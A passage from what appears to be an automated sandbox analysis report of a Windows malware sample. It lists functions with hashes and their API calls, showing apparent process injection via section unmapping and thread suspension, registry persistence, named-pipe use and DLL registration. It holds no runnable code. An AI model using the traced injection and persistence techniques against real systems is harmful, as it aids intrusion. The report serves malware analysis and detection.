  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
